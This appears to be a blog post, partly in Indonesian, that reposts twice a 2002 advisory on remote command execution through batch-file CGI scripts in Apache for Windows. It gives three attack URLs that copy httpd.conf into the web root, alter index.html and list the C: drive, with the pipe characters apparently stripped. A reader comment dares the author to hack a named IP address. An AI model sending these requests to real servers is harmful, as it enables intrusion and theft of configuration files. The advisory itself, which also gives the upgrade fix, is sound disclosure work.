Kemungkinan menggunakan remote command dengan penggunaan karakter ''. Pada Apache Web Server 2.0.X disertakan file /cgi-bin/test-cgi.bat yang dapat digunakan untuk pengexploitasian karakter '' ini. Tetapi bukan hanya itu saja, semua file dengan extensi .bat atau .cmd dapat digunakan untuk exploitai ini.
Contoh Penggunaan :
1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd. conf Perintah ini untuk mengkopi file httpd.conf ke public wwwroot (sama dengan c:\inetpub\wwwroot di IIS)
2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html Perintah ini untuk menambahkan kata FOOBAR ke file index.html di public wwwroot
3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt Pasti tau :)
Catatan ;
Karakter '+' menandakan spasi (spacebar) (sama dengan karakter %20 di IIS)
ORIGINAL :
Vulnerability in Apache for Win32 batch file processing - Remote command execution
= Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com
= Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
= Vendor: Apache group
= Product: Apache web server (Win32) - Running DOS batch files
Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
= Severity: High, remote command execution and arbitrary file viewing.
= CVE candidate: CAN-2002-0061 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061)
= Summary: Because of a the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('') character.
** IMPORTANT **
The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.
= Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
Example:
1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd.conf
This request will copy the httpd.conf file residing in the /conf directory of the Apache installation, into the virtual web root where it can be viewed by any user.
2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html
This will append the string "Foobar" to the index.html file residing in the virtual web root directory.
3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt
This will create a file containing the directory listing of the C: drive, and will put the file in the virtual web root, where any user can read it.
** Notes:
1) Url-Decoding is not provided by Apache except for the '+' character which is substituted by a space character.
2) Spilling the output into the STDOUT would most likely cause Apache to write an error message since it expects the STDOUT of a CGI script to have an HTTP response format (potential HTTP headers followed by a mandatory blank line followed by a response body). Therefore in order to view the result of a command, it is
recommended that you redirect the output to a file under the web server's virtual root.
= Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later today), or 2.0.34-beta (which will be published soon). Downloads are located at:
http://www.apache.org/dist/httpd/
Contoh Penggunaan :
1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd. conf Perintah ini untuk mengkopi file httpd.conf ke public wwwroot (sama dengan c:\inetpub\wwwroot di IIS)
2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html Perintah ini untuk menambahkan kata FOOBAR ke file index.html di public wwwroot
3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt Pasti tau :)
Catatan ;
Karakter '+' menandakan spasi (spacebar) (sama dengan karakter %20 di IIS)
ORIGINAL :
Vulnerability in Apache for Win32 batch file processing - Remote command execution
= Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com
= Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)
= Vendor: Apache group
= Product: Apache web server (Win32) - Running DOS batch files
Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)
= Severity: High, remote command execution and arbitrary file viewing.
= CVE candidate: CAN-2002-0061 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061)
= Summary: Because of a the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('') character.
** IMPORTANT **
The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.
= Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.
Example:
1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd.conf
This request will copy the httpd.conf file residing in the /conf directory of the Apache installation, into the virtual web root where it can be viewed by any user.
2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html
This will append the string "Foobar" to the index.html file residing in the virtual web root directory.
3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt
This will create a file containing the directory listing of the C: drive, and will put the file in the virtual web root, where any user can read it.
** Notes:
1) Url-Decoding is not provided by Apache except for the '+' character which is substituted by a space character.
2) Spilling the output into the STDOUT would most likely cause Apache to write an error message since it expects the STDOUT of a CGI script to have an HTTP response format (potential HTTP headers followed by a mandatory blank line followed by a response body). Therefore in order to view the result of a command, it is
recommended that you redirect the output to a file under the web server's virtual root.
= Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later today), or 2.0.34-beta (which will be published soon). Downloads are located at:
http://www.apache.org/dist/httpd/
1 comment:
nih buktiin kalo kamu bener2 hacker...cz q baca tulisan pusing ...kamu benar asli bisa atau copaz... silahkan di hack... 49.0.4.221
Post a Comment